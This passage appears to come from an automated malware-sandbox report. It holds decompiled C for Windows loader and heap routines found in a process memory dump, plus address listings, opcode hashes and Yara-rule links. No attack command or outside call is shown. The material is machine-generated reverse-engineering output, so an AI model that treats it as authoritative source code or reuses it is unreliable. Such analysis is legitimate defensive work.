												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E033EF3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L033C77F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E033DA44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L033C77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E033E96C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































                                          0x033b849b
                                          0x033b849b
                                          0x033b849b
                                          0x033b849b
                                          0x033b849d
                                          0x033b84a2
                                          0x033b84a7
                                          0x033b84b1
                                          0x033b84d8
                                          0x00000000
                                          0x033b84b3
                                          0x033b84c4
                                          0x033b84c9
                                          0x033b84cd
                                          0x033b84cf
                                          0x033b84cf
                                          0x033b84d6
                                          0x033b84e6
                                          0x033b84e9
                                          0x033b84ec
                                          0x033b84ef
                                          0x033b84f2
                                          0x033b84f4
                                          0x033b84fc
                                          0x033b8501
                                          0x033b8506
                                          0x033b8509
                                          0x033b86e0
                                          0x033b86e5
                                          0x033b86e8
                                          0x033b86ed
                                          0x033b86f0
                                          0x033b86f2
                                          0x03409afd
                                          0x03409b02
                                          0x033b84da
                                          0x033b84df
                                          0x033b84df
                                          0x033b86fa
                                          0x033b86fd
                                          0x033b86fe
                                          0x033b8701
                                          0x033b8706
                                          0x033b8709
                                          0x033b870b
                                          0x00000000
                                          0x00000000
                                          0x033b8711
                                          0x033b8725
                                          0x033b8727
                                          0x033b872a
                                          0x033b872c
                                          0x03409af0
                                          0x03409af5
                                          0x033b8732
                                          0x033b8732
                                          0x033b8732
                                          0x033b8735
                                          0x033b8737
                                          0x033b8515
                                          0x033b8515
                                          0x033b8518
                                          0x033b851d
                                          0x033b8523
                                          0x033b8527
                                          0x033b852b
                                          0x033b8537
                                          0x033b8539
                                          0x033b853c
                                          0x033b853e
                                          0x033b868c
                                          0x033b8691
                                          0x033b8699
                                          0x033b869b
                                          0x033b8744
                                          0x033b8748
                                          0x033b86a1
                                          0x033b86a1
                                          0x033b86a1
                                          0x033b86a4
                                          0x033b86a8
                                          0x03409bdf
                                          0x03409bdf
                                          0x033b86ae
                                          0x033b86b0
                                          0x00000000
                                          0x033b86b6
                                          0x00000000
                                          0x03409be9
                                          0x033b86b0
                                          0x033b8544
                                          0x033b854a
                                          0x033b854d
                                          0x033b8551
                                          0x033b876e
                                          0x033b8778
                                          0x033b877b
                                          0x033b8780
                                          0x033b8557
                                          0x033b8557
                                          0x033b855d
                                          0x033b855d
                                          0x033b856b
                                          0x033b856e
                                          0x033b8570
                                          0x033b8573
                                          0x033b8576
                                          0x033b8576
                                          0x033b8579
                                          0x033b857b
                                          0x00000000
                                          0x00000000
                                          0x033b8581
                                          0x033b85a0
                                          0x033b85a2
                                          0x033b85a5
                                          0x033b85a7
                                          0x03409b1b
                                          0x03409b1b
                                          0x033b862e
                                          0x033b862e
                                          0x033b8631
                                          0x033b8631
                                          0x033b8634
                                          0x033b8636
                                          0x033b8669
                                          0x033b8669
                                          0x033b866b
                                          0x03409bbf
                                          0x03409bc4
                                          0x03409bc8
                                          0x03409bce
                                          0x03409bce
                                          0x033b8671
                                          0x033b8671
                                          0x033b8674
                                          0x033b8676
                                          0x03409bae
                                          0x03409bae
                                          0x033b8676
                                          0x033b867c
                                          0x033b867e
                                          0x033b8688
                                          0x033b8688
                                          0x00000000
                                          0x033b867e
                                          0x033b8638
                                          0x033b8638
                                          0x033b863b
                                          0x033b863e
                                          0x033b863f
                                          0x033b8642
                                          0x033b8645
                                          0x033b8648
                                          0x033b864d
                                          0x03409b69
                                          0x03409b6e
                                          0x03409b7b
                                          0x03409b81
                                          0x03409b85
                                          0x03409b89
                                          0x03409ba7
                                          0x03409b8b
                                          0x03409b91
                                          0x03409b9a
                                          0x03409b9f
                                          0x03409b9f
                                          0x033b8788
                                          0x033b878d
                                          0x033b8763
                                          0x033b8763
                                          0x033b8766
                                          0x00000000
                                          0x033b8766
                                          0x03409b70
                                          0x00000000
                                          0x03409b70
                                          0x033b8656
                                          0x033b865a
                                          0x033b865c
                                          0x033b8752
                                          0x033b8756
                                          0x00000000
                                          0x00000000
                                          0x033b875e
                                          0x00000000
                                          0x033b875e
                                          0x033b8662
                                          0x033b8662
                                          0x033b8662
                                          0x033b8666
                                          0x00000000
                                          0x033b8666
                                          0x033b85b7
                                          0x033b85b9
                                          0x033b85bc
                                          0x033b85bf
                                          0x033b85cc
                                          0x033b85d1
                                          0x033b85d4
                                          0x033b85db
                                          0x033b85de
                                          0x033b85e0
                                          0x03409b5f
                                          0x00000000
                                          0x03409b5f
                                          0x033b85e6
                                          0x033b85ea
                                          0x033b86c3
                                          0x033b86c5
                                          0x033b86c8
                                          0x033b86ca
                                          0x03409b16
                                          0x00000000
                                          0x03409b16
                                          0x033b86d6
                                          0x033b85f6
                                          0x033b85f6
                                          0x033b85f9
                                          0x033b8602
                                          0x033b8606
                                          0x033b860a
                                          0x033b860b
                                          0x033b860e
                                          0x033b8611
                                          0x00000000
                                          0x033b8611
                                          0x033b85f3
                                          0x00000000
                                          0x033b85f3
                                          0x033b8619
                                          0x033b861e
                                          0x033b861e
                                          0x033b8621
                                          0x033b8622
                                          0x033b8623
                                          0x033b8625
                                          0x033b862c
                                          0x00000000
                                          0x033b873d
                                          0x00000000
                                          0x033b873d
                                          0x033b8737
                                          0x033b850f
                                          0x033b8512
                                          0x00000000
                                          0x033b8512
                                          0x00000000
                                          0x033b84d6

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 06565384adad7db57746a14abb8266723283fb96fdea99173f5c793c44025732
                                          • Instruction ID: 06e1a0caf2a881339a1fadc2c1350472b84aa78719e1c801ec1186350e8695a3
                                          • Opcode Fuzzy Hash: 06565384adad7db57746a14abb8266723283fb96fdea99173f5c793c44025732
                                          • Instruction Fuzzy Hash: E6B15874E00389DFCB14DFA8C9C4AEEBBB9BF48304F14412AE615AFA95D770A945CB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033D513A, Relevance: .3, Instructions: 258COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 67%
                                          			E033D513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x349d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E033ED0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E033C2280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L033C4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E033EF3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E033BFFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x349b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E033EB640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                                          0x033d5142
                                          0x033d514c
                                          0x033d5150
                                          0x033d5157
                                          0x033d5159
                                          0x033d515e
                                          0x033d5165
                                          0x033d5169
                                          0x033d516c
                                          0x033d5172
                                          0x033d5176
                                          0x033d517a
                                          0x033d517a
                                          0x033d517a
                                          0x033d517f
                                          0x03416d8b
                                          0x03416d8e
                                          0x03416d91
                                          0x03416d95
                                          0x03416d98
                                          0x03416d9c
                                          0x03416da0
                                          0x03416da3
                                          0x03416da7
                                          0x03416e26
                                          0x03416e26
                                          0x03416e2a
                                          0x033d51f9
                                          0x033d51f9
                                          0x033d51fe
                                          0x03416e33
                                          0x03416e33
                                          0x03416e39
                                          0x03416e3d
                                          0x03416e46
                                          0x03416e50
                                          0x00000000
                                          0x00000000
                                          0x03416e52
                                          0x03416e53
                                          0x03416e56
                                          0x03416e5d
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03416e5f
                                          0x03416e67
                                          0x03416e77
                                          0x03416e7f
                                          0x03416e80
                                          0x03416e88
                                          0x03416e90
                                          0x03416e9f
                                          0x03416ea5
                                          0x03416ea9
                                          0x03416eb1
                                          0x03416ebf
                                          0x00000000
                                          0x00000000
                                          0x03416ecf
                                          0x03416ed3
                                          0x00000000
                                          0x00000000
                                          0x03416edb
                                          0x03416ede
                                          0x03416ee1
                                          0x03416ee8
                                          0x03416eeb
                                          0x03416eed
                                          0x03416ef0
                                          0x03416ef4
                                          0x03416ef8
                                          0x03416efc
                                          0x00000000
                                          0x00000000
                                          0x03416f0d
                                          0x03416f11
                                          0x03416f32
                                          0x03416f37
                                          0x03416f3b
                                          0x03416f3e
                                          0x03416f41
                                          0x03416f46
                                          0x00000000
                                          0x00000000
                                          0x03416f4c
                                          0x03416f50
                                          0x03416f50
                                          0x03416f54
                                          0x03416f62
                                          0x03416f65
                                          0x03416f6d
                                          0x03416f7b
                                          0x03416f7b
                                          0x03416f93
                                          0x03416f98
                                          0x03416fa0
                                          0x03416fa6
                                          0x03416fb3
                                          0x03416fb6
                                          0x03416fbf
                                          0x03416fc1
                                          0x03416fd5
                                          0x03416fda
                                          0x03416fda
                                          0x03416fdd
                                          0x03416fe2
                                          0x03416fe7
                                          0x03416feb
                                          0x03416fef
                                          0x03416ff3
                                          0x033d520c
                                          0x033d520c
                                          0x033d520f
                                          0x033d5215
                                          0x033d5234
                                          0x033d523a
                                          0x033d523a
                                          0x033d5244
                                          0x033d5245
                                          0x033d5246
                                          0x033d5251
                                          0x033d5251
                                          0x03416f13
                                          0x03416f17
                                          0x03416f17
                                          0x03416f18
                                          0x03416f1b
                                          0x03416f1f
                                          0x03416f23
                                          0x00000000
                                          0x03416f28
                                          0x033d5204
                                          0x033d5204
                                          0x033d5208
                                          0x00000000
                                          0x033d5208
                                          0x033d5185
                                          0x033d5188
                                          0x033d518a
                                          0x033d518e
                                          0x033d5195
                                          0x03416db1
                                          0x03416db5
                                          0x03416db9
                                          0x033d519b
                                          0x033d519b
                                          0x033d519e
                                          0x033d51a7
                                          0x033d51a9
                                          0x033d51a9
                                          0x033d51b5
                                          0x033d51b8
                                          0x033d51bb
                                          0x033d51be
                                          0x033d51c1
                                          0x033d51c5
                                          0x033d51c9
                                          0x033d51cd
                                          0x033d51cd
                                          0x033d51d8
                                          0x033d51dc
                                          0x033d51e0
                                          0x03416dcc
                                          0x03416dd0
                                          0x03416dd5
                                          0x03416ddd
                                          0x03416de1
                                          0x03416de1
                                          0x03416de5
                                          0x03416deb
                                          0x03416df1
                                          0x03416df7
                                          0x03416dfd
                                          0x03416e01
                                          0x03416e05
                                          0x03416e09
                                          0x03416e0d
                                          0x03416e11
                                          0x03416e11
                                          0x033d51eb
                                          0x03416e1a
                                          0x03416e1f
                                          0x03416e21
                                          0x03416e23
                                          0x00000000
                                          0x033d51f1
                                          0x033d51f1
                                          0x00000000
                                          0x033d51f1

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1a5dbccdd9131facd543d09ecbe588023f0bbabfeb95479ea2b95a916c04c03b
                                          • Instruction ID: 7646dd69b11521c84944b7ad5a0f3afd21242f746cf964082220143f86d837d1
                                          • Opcode Fuzzy Hash: 1a5dbccdd9131facd543d09ecbe588023f0bbabfeb95479ea2b95a916c04c03b
                                          • Instruction Fuzzy Hash: C9C132755087808FD364CF28C580A6AFBF1BF89304F188A6EF8998B352D775E845CB46
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033D03E2, Relevance: .3, Instructions: 254COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 74%
                                          			E033D03E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x349d360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E033D0548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E033EB640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E033BB02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x3497c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E033C7D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E033C7D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E03427016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E033E9830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E034269A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x3497c04 != 0) {
						_t118 = _v12;
						_t120 = E0342A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x3497bd8;
						if( *0x3497bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E033E95D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E033E99A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E03423540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E033AB1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E033EAAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x3498474 - 3;
										if( *0x3498474 != 3) {
											 *0x34979dc =  *0x34979dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E033C7D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E033C7D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E03427016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x3498708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x3497b00; // 0x0
							asm("ror esi, cl");
							 *0x349b1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E033E95D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E033B7F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                                          0x033d03f1
                                          0x033d03f7
                                          0x033d03f9
                                          0x033d03fb
                                          0x033d03fd
                                          0x033d0400
                                          0x033d040a
                                          0x03414c7a
                                          0x033d0537
                                          0x033d0547
                                          0x033d0410
                                          0x033d0410
                                          0x033d0414
                                          0x033d0417
                                          0x033d041a
                                          0x033d0421
                                          0x033d0424
                                          0x033d042b
                                          0x033d043b
                                          0x033d043e
                                          0x033d043f
                                          0x033d043f
                                          0x033d0446
                                          0x033d0449
                                          0x033d044c
                                          0x033d044f
                                          0x033d0459
                                          0x03414c8d
                                          0x033d045f
                                          0x033d045f
                                          0x033d045f
                                          0x033d0467
                                          0x03414c97
                                          0x03414c9d
                                          0x03414ca4
                                          0x03414caa
                                          0x03414caf
                                          0x03414cb1
                                          0x03414cc3
                                          0x03414cb3
                                          0x03414cbc
                                          0x03414cbc
                                          0x03414cc8
                                          0x03414ccb
                                          0x03414cd7
                                          0x03414cda
                                          0x03414cdf
                                          0x03414cdf
                                          0x03414ccb
                                          0x03414ca4
                                          0x033d046d
                                          0x033d046f
                                          0x033d046f
                                          0x033d0471
                                          0x033d0476
                                          0x033d047a
                                          0x033d047b
                                          0x033d0483
                                          0x033d0489
                                          0x033d048d
                                          0x00000000
                                          0x00000000
                                          0x03414ce9
                                          0x03414cef
                                          0x03414d22
                                          0x03414d22
                                          0x00000000
                                          0x03414d22
                                          0x03414cf1
                                          0x03414cf7
                                          0x00000000
                                          0x00000000
                                          0x03414cf9
                                          0x03414cff
                                          0x00000000
                                          0x00000000
                                          0x03414d05
                                          0x03414d07
                                          0x00000000
                                          0x00000000
                                          0x03414d0d
                                          0x03414d0f
                                          0x03414d14
                                          0x03414d16
                                          0x00000000
                                          0x00000000
                                          0x03414d1c
                                          0x03414d1c
                                          0x033d0499
                                          0x033d0535
                                          0x033d0535
                                          0x00000000
                                          0x033d0535
                                          0x033d04a6
                                          0x03414d2c
                                          0x03414d37
                                          0x03414d39
                                          0x03414d3b
                                          0x00000000
                                          0x00000000
                                          0x03414d41
                                          0x03414d48
                                          0x033d0527
                                          0x033d052b
                                          0x033d052d
                                          0x033d0530
                                          0x033d0530
                                          0x00000000
                                          0x033d052b
                                          0x03414d4e
                                          0x033d04ac
                                          0x033d04ac
                                          0x033d04af
                                          0x033d04b2
                                          0x033d04b7
                                          0x033d04b9
                                          0x033d04bb
                                          0x033d04bd
                                          0x033d04bf
                                          0x033d04c5
                                          0x033d04c9
                                          0x03414d53
                                          0x03414d59
                                          0x03414db9
                                          0x03414dba
                                          0x03414dbf
                                          0x03414dc2
                                          0x03414dc4
                                          0x03414dc7
                                          0x03414dce
                                          0x00000000
                                          0x03414dce
                                          0x03414d5b
                                          0x03414d61
                                          0x00000000
                                          0x00000000
                                          0x03414d63
                                          0x03414d69
                                          0x00000000
                                          0x00000000
                                          0x03414d6b
                                          0x03414d6e
                                          0x03414d74
                                          0x03414d76
                                          0x03414d7c
                                          0x03414d7e
                                          0x03414d84
                                          0x03414d89
                                          0x03414d8c
                                          0x03414d8d
                                          0x03414d92
                                          0x03414d95
                                          0x03414d96
                                          0x03414d98
                                          0x03414d9a
                                          0x03414d9f
                                          0x03414da4
                                          0x03414da6
                                          0x03414da8
                                          0x03414daf
                                          0x03414db1
                                          0x03414db1
                                          0x03414daf
                                          0x03414da6
                                          0x03414d84
                                          0x03414d7c
                                          0x00000000
                                          0x03414d74
                                          0x033d04d6
                                          0x03414de1
                                          0x033d04dc
                                          0x033d04dc
                                          0x033d04dc
                                          0x033d04e4
